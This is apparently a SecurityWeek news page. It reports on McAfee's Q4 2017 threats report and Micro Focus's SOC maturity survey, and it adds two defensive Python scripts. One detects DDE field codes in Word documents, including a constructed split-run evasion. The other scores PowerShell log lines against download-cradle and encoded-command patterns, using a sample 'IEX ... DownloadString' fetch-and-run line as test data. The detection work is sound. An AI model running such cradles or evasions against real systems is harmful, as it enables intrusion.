Usual Threats, But More Sophisticated and Faster: Report

Almost Every Type of Cyber Attack is Increasing in Both Volume and Sophistication

Eight new malware samples were recorded every second during the final three months of 2017. The use of fileless attacks, primarily via PowerShell, grew; and there was a surge in cryptocurrency-mining (cryptojacking) malware.

These were the primary threats outlined in the latest McAfee Labs Threats Report (PDF), covering Q4 2017.

The growth of cryptomining malware coincided with the surge in Bitcoin value, which peaked at just under $20,000 on Dec. 22. With the cost of dedicated mining hardware at upwards of $5,000 per machine, criminals chose to steal users’ CPU time via malware. It demonstrates how criminals always follow the money, and choose the least expensive method of acquiring it with the greatest chance of avoiding detection.

Since December, Bitcoin’s value has fallen to around $9,000 (at the time of publishing). Criminals’ focus on Bitcoin is shifting accordingly, with Ethereum and Monero becoming popular. Last week, Microsoft disclosed a major campaign whose payload mined Electroneum on infected machines. “We currently see discussions in underground forums that suggest moving from Bitcoin to Litecoin because the latter is a safer model with less chance of exposure,” comments Raj Samani, chief scientist and McAfee fellow with the Advanced Threat Research team.

The speed with which criminals adapt to the latest market conditions is also seen in the way they maximize their asymmetric advantage. “Adversaries,” writes Samani, “have the luxury of access to research done by the technical community, and can download and use open-source tools to support their campaigns, while the defenders’ level of insight into cybercriminal activities is considerably more limited, and identifying evolving tactics often must take place after malicious campaigns have begun.”

Examples of attackers making use of legitimate research include Fancy Bear (APT28) leveraging, in November 2017, a Microsoft Office Dynamic Data Exchange (DDE) technique that had been made public just a few weeks earlier. The hackers used it in a phishing campaign that cited the New York City terror attacks. A second example comes from the December 2017 Gold Dragon attacks on organizations involved with the Winter Olympics. In this case the attackers employed steganography, “and a new tool released days before the attack.”
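Defenders can at least check inbound documents for the field codes that the DDE technique depends on. The scanner below is an added example, not code from McAfee, from the report, or from any of the campaigns above. It assumes only the OOXML layout of a .docx (field codes live in word/document.xml and sibling parts), and every sample document in it is constructed in memory; the split-run sample is a constructed evasion, not one taken from the Fancy Bear documents.

```python
"""Find Dynamic Data Exchange (DDE / DDEAUTO) field codes inside a .docx.

Added example, not code from McAfee, from the report, or from any campaign it
describes. A .docx is a zip archive. Word keeps field codes in word/document.xml
(and in header, footer and footnote parts) either as a simple field,
<w:fldSimple w:instr="...">, or as a run sequence bracketed by
<w:fldChar w:fldCharType="begin"/> ... "end" with the code in one or more
<w:instrText> runs. The documents built below are constructed and are not
complete Word files; only the part the scanner reads is present.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_RE = re.compile(r"^DDE(?:AUTO)?\b", re.I)  # applied after whitespace is normalized


def field_codes(xml_bytes):
    """Yield every field code in one XML part, joining the instrText runs of a field."""
    stack = []  # one buffer per open complex field; fields may nest
    for el in ET.fromstring(xml_bytes).iter():  # document order
        if el.tag == W + "fldSimple":
            yield el.get(W + "instr", "")
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                yield "".join(stack.pop())
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
    for buf in stack:  # report unterminated fields too; malformed XML is no alibi
        yield "".join(buf)


def scan_docx(data):
    """Return [(part name, normalized field code)] for each DDE field in the archive."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            for code in field_codes(zf.read(name)):
                code = " ".join(code.split())  # collapse spaces, tabs and newlines
                if DDE_RE.match(code):
                    hits.append((name, code))
    return hits


def make_docx(document_xml):
    """Constructed minimal archive holding only word/document.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


HEAD = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p>')
TAIL = "</w:p></w:body></w:document>"

# Constructed samples. "placeholder.exe topic item" stands in for the application,
# topic and item arguments of a DDEAUTO field; nothing here is executed.
SIMPLE_DDE = HEAD + ('<w:fldSimple w:instr="DDEAUTO placeholder.exe topic item">'
                     '<w:r><w:t>x</w:t></w:r></w:fldSimple>') + TAIL

# Code split across runs, mixed case, padded with whitespace and a newline: a
# constructed evasion that a naive substring search for "DDEAUTO" misses.
SPLIT_DDE = HEAD + (
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve">  dde</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">auto placeholder.exe\n topic</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>cached result</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>') + TAIL

# Ordinary DATE and HYPERLINK fields, which must not be flagged.
BENIGN = HEAD + (
    '<w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "><w:r><w:t>1 March 2018</w:t></w:r></w:fldSimple>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> HYPERLINK "https://example.invalid" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>') + TAIL

if __name__ == "__main__":
    for label, xml in (("simple", SIMPLE_DDE), ("split", SPLIT_DDE), ("benign", BENIGN)):
        print(label, scan_docx(make_docx(xml)))
```

The point of joining instrText runs before matching is that Word itself concatenates them, so an attacker can spread "DDEAUTO" over several runs and still get the field evaluated. The scanner does not resolve nested QUOTE fields that assemble the code from character codes, a later obfuscation; a document carrying any field code you cannot account for deserves a look regardless of whether this check fires.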

The speed with which attackers change tactics and adopt new techniques contrasts sharply with the delays inherent in patching known vulnerabilities. Equifax’s failure, for more than two months, to apply the Apache Struts patch (for CVE-2017-5638) across all of its systems is a prime example.

Healthcare organizations remained a significant target throughout 2017, with a 210% increase in publicly disclosed incidents, year on year — although figures declined 78% in Q4. McAfee’s research conclusion is that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

Botnets are a continuing problem. However, in Q4 2017, just two botnets, Necurs and Gamut, accounted for 97% of all spam botnet traffic. Gamut was responsible for delivering job offer-themed phishing (and possible money mule recruitment), in English, German, and Italian; while Necurs delivered ‘lonely girl’ spam, pump and dump stock spam, and Locky ransomware downloaders.

New ransomware detections grew consistently throughout 2017, culminating in more than 2,000,000 detections in Q4 (compared to fewer than 500,000 in Q4 2016). “A big contributor to ransomware growth was Ransom:Win32/Genasom (also known as Stampado, with variants such as ‘Philadelphia’). This family provides an inexpensive entrée for cyber criminals, being offered for sale for as little as $39 for a lifetime license.”

Ransomware didn’t merely increase in volume (59% year on year, and 35% in Q4 alone), it also diversified beyond just extorting money. “Actors devised strategies to create ‘smoke and mirrors’ by distracting defenders from actual attacks,” writes Samani, “such as the emergence of pseudoransomware, seen in NotPetya and a Taiwan bank heist.”

The big takeaway from the latest McAfee Labs Threats Report is that the cybersecurity threat landscape is continuing to worsen. Just about every type of attack is increasing in both volume and sophistication. The increasing use of PowerShell and JavaScript to avoid malicious file detection is just one example. In Q1 2016 there were around 2,000 detections. By Q4 2017, this had grown to just under 48,000, boosted “by a rash of downloaders in Q4”.
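The PowerShell numbers above are a detection problem as much as a statistic: the fileless downloaders McAfee counts leave a command line or a script block in the Windows event log, often with the payload base64-encoded behind -EncodedCommand. As an added example, not code from McAfee or from the report, the scorer below decodes that encoding (base64 over UTF-16LE) before matching, so an encoded download cradle is caught the same way as a cleartext one. The log format, the indicator weights, the threshold and every log line are constructed assumptions.

```python
"""Flag fileless PowerShell activity in (constructed) Windows log lines.

Added example, not code from McAfee or from the report. It assumes a plain text
export where each line is "<event id> <command line or script block>", as you
might dump from Event ID 4688 (process creation with command-line auditing on)
or 4104 (PowerShell script block logging). Every log line below is constructed.
"""
import base64
import re

# Weighted indicators. A download cradle or Invoke-Expression counts for more than
# -NoProfile or a hidden window, which legitimate scheduled tasks also use.
INDICATORS = [
    ("encoded_command", 2, re.compile(
        r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/]{16,}={0,2}", re.I)),
    ("download_cradle", 3, re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("invoke_expression", 3, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", 1, re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("policy_bypass", 1, re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
    ("base64_decode", 1, re.compile(r"FromBase64String", re.I)),
]
THRESHOLD = 4  # one strong indicator plus anything else, or several weak ones

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the usual ones.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)


def encode_powershell(command):
    """Encode a command the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 (binascii.Error) or an odd byte count
        return None


def analyze_line(line):
    """Score one log line; indicators are matched on the raw text and the decoded payload."""
    event_id, _, text = line.strip().partition(" ")
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = [name for name, _w, rx in INDICATORS if rx.search(haystack)]
    score = sum(w for name, w, _rx in INDICATORS if name in hits)
    return {"event_id": event_id, "text": text, "decoded": decoded,
            "indicators": hits, "score": score, "suspicious": score >= THRESHOLD}


def analyze_log(log):
    return [analyze_line(l) for l in log.splitlines() if l.strip()]


# Constructed sample: a classic download cradle, once hidden behind -Enc and once in
# the clear, plus two benign lines. example.invalid is a reserved, unresolvable name.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_LOG = f"""
4688 powershell.exe -NoP -W Hidden -Enc {encode_powershell(CRADLE)}
4104 Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object
4104 {CRADLE}
4688 powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1
"""

if __name__ == "__main__":
    for r in analyze_log(SAMPLE_LOG):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok        "
        print(f"{flag} score={r['score']:2d} {r['indicators']} {r['text'][:60]}")
```

Matching on the decoded payload as well as the raw line is what makes the first sample line score higher than the cleartext cradle: the encoding itself, the hidden window and -NoProfile all add to the cradle and IEX found inside it. Script block logging (4104) records the script after PowerShell has decoded it, so for hosts where it is enabled the decoding step matters less; for process-creation events (4688) it is essential.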

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.


SOC Performance Improves, But Remains Short of Optimum: Report

The good news is that security operations centers (SOCs) are becoming more efficient. The not-so-good news is that there is still considerable scope for improvement.

This is the conclusion of the fifth annual Micro Focus State of Security Operations Report for 2018 (PDF), which draws on 200 assessments of 144 discrete SOC organizations in 33 countries. Specifically, there has been an overall 12% improvement in SOC maturity, the most significant shift yet in the five years of the survey. Despite this, the median SOC maturity level stands at just 1.42 across all industries, significantly below the Micro Focus recommended target of 3.0.

The report uses the Micro Focus Security Operations Maturity Model (SOMM) methodology for assessments. This is based on the Carnegie Mellon Software Engineering Institute’s Capability Maturity Model Integration (SEI CMMI), which Micro Focus has updated at regular intervals to stay relevant to current information security trends and threat capabilities.

SOMM evaluates SOCs on the basis of people and processes, technology, and business capabilities. Despite the remaining room for improvement, this year’s results show that organizations are beginning to see a return on their security investments and are seeing more value out of the security solutions they have deployed.

“Over the last five years, we have watched organizations attempt to achieve a complete security transformation by applying Band-Aids – such as the purchase of peripheral products or dismantling of solutions – only to find poor results and poor business alignment,” said Matthew Shriner, vice president, Security Professional Services for Micro Focus. “With that in mind, it is refreshing that when it comes to cyber defense capability, Micro Focus is seeing a much higher degree of operational sophistication than ever before. Nearly 25% of organizations assessed are meeting business goals, representing a nearly 10% year-over-year improvement.”

The SOMM gives a rating between 0 and 5. ‘0’ represents a complete lack of capability, while ‘5’ is given for a capability that is consistent, repeatable, documented, measured, tracked, and continually improved upon. Micro Focus believes that enterprises should seek a maturity level of 3, while managed security service providers should target a level between 3 and 4. The reliable detection of malicious activity, and a systematic approach to managing that activity are considered to be the most important success criteria for mature cyber defense. 

Despite the overall improvement in maturity levels, the report notes that “20 percent of cyber defense organizations that were assessed over the past 5 years failed to score a security operations maturity model (SOMM) level 1. These organizations continue to operate in an ad-hoc manner with undocumented processes and significant gaps in security and risk management.”

Geographically, the top performing areas are South America (SOMM score of 1.89) and the Benelux countries (1.79). In both cases the report suggests this may be down to a continuing trend “toward the use of niche service providers with a high degree of maturity, and initial investment by new service provider organizations entering the market. Niche provider SOC organizations in those regions are often willing to deliver a highly customized service to their customers and are starting to explore Hunt-as-a-Service offerings as part of their services portfolio.”

The UK and DACH countries (Germany, Austria and Switzerland) all showed improvement — 17% for the former and 9% for the latter. “Analysis,” notes the report, “revealed multinational organizations making security investments in preparation for the General Data Protection Regulation (GDPR) which is currently scheduled to become enforceable in May of 2018. The consolidation and relocation of SOCs within the EMEA regions to form Security Fusion Centers have also improved the effectiveness of security operations.”

North American SOCs showed only a limited improvement of 1%; but that follows a major improvement of 34% last year, and at 1.53 the region remains ahead of the UK’s 1.47. “Security operations teams in North America,” says the report, “once again led as the region most willing to undergo external evaluations of their cyber defense capability and experienced accelerated results based on the implementation of targeted roadmaps.”

Cloud migration has proven a problem for many SOCs. In most organizations, the cloud strategy focuses on application functionality without accounting for security and logging requirements. “Plans to monitor,” notes the report, “did not follow key assets to the cloud for most security operations centers, leaving these SOCs with visibility only into the functionality that remained within legacy data center space.”

In 2015, Micro Focus noted that organizations had begun to invest in big data lakes and analytics. By 2017, assessments showed that some SOCs are performing successful analytics, usually mining historical data for TTPs and IoCs — but, “for the majority of organizations assessed such investments continue to be a science experiment with an uncertain future.”

The use of deception grids continues to grow. The purpose is to increase the cost of an attack by tricking the attacker into deploying resources that are ineffective, while simultaneously learning about both the attacker and their intentions. Micro Focus expects this practice to grow, and will monitor the use of deception grids and their effect on SOC maturity in future years.

Overall, Micro Focus is optimistic over SOC progress in 2017, but warns that SOCs are no quick fix for security. “Successful security operations programs require an assessment of the risk management, security, and compliance objectives of the organization and the active tuning of the solutions deployed.”


Exploiting the User PII Held in Everyone’s Web Browser

Browsers are the single most used application today. Everyone uses at least one browser, whether in the office or at home. But not everyone realizes just how much personal data is left hanging around inside their browsers; nor how easy it is for third-…